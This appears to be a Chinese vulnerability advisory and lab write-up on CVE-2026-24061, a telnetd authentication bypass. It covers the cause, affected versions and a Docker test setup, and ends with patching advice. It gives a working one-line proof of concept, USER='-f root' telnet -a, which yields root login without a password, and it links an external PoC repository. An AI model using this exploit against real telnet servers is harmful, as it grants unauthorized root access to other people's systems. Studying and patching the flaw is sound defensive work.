标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2026-3606]   作者: 闲云野鸡 发表于: [2026-01-25]

本文共 [0] 位读者顶过

漏洞概述

CVE-2026-24061是由环境变量引起的漏洞,GNU inetutils-telnetd 中的一个漏洞允许远程攻击者通过 telnet 选项绕过认证NEW_ENVIRON。通过发送包含“-f root”值的自定义USER环境变量,攻击者可以欺骗登录进程在没有凭证的情况下授予shell

漏洞影响

GNU inetutils-telnetd 版本 2.6 之前

检测命令

dpkg -S /usr/sbin/telnetd && telnetd --version

image.png

细节原理:

telnetd 守护进程将 USER 环境变量从传输中直接传递NEW_ENVIRON到 /bin/login。当值为“-f root”时,登录时会将其解读为命令行标志,表示已进行预认证,从而完全绕过密码验证。

漏洞复现

环境准备

docker环境,使用dockerfile

创建dockerfile

FROM ubuntu:24.04 # 避免交互式安装提示 ENV DEBIAN_FRONTEND=noninteractive # 更新软件源 + 安装必要的软件包 + 清理缓存 RUN apt-get update && \
    apt-get install -y \
        openbsd-inetd \
        inetutils-telnetd \
        telnet \
        passwd && \
    apt-get clean && \ rm -rf /var/lib/apt/lists/* # 启用 telnet 服务(把 #<off># 开头的行取消注释) RUN sed -i 's/^#<off># telnet/telnet/' /etc/inetd.conf # 设置 root 密码(生产环境强烈不建议这样做,仅用于测试/学习) RUN echo "root:root123" | chpasswd # 暴露 telnet 默认端口 EXPOSE 23 # 启动 inetd(-d 表示 debug 模式,会在前台输出日志,便于调试) CMD ["/usr/sbin/inetd", "-d"] 

快速搭建

# 构建镜像 docker build -t my-telnet:test .  # 运行(映射 23 端口,建议只本地测试) docker run -d -p 127.0.0.1:2323:23 --name test-telnet my-telnet:test  # 连接测试(在本机) telnet 127.0.0.1 2323  # 登录:root / root123 

image.png

漏洞验证

poc

USER='-f root' telnet -a ip port

验证

USER='-f root' telnet -a 127.0.0.1 2323 

image.png[出自:jiwo.org]
成功登录

漏洞验证脚本
https://github.com/JayGLXR/CVE-2026-24061-POC.git

防御建议

  1. 立即补丁与更新
  • 将telnet升级到2.6版本以上
  1. 协议替代与停用
  • 弃用 Telnet:Telnet 本身是明文协议,且代码库陈旧。
  • 关闭不必要的监听:如果你不需要远程访问,请关闭 inetd 监听。

评论

暂无
发表评论
 返回顶部 
热度(0)
 关注微信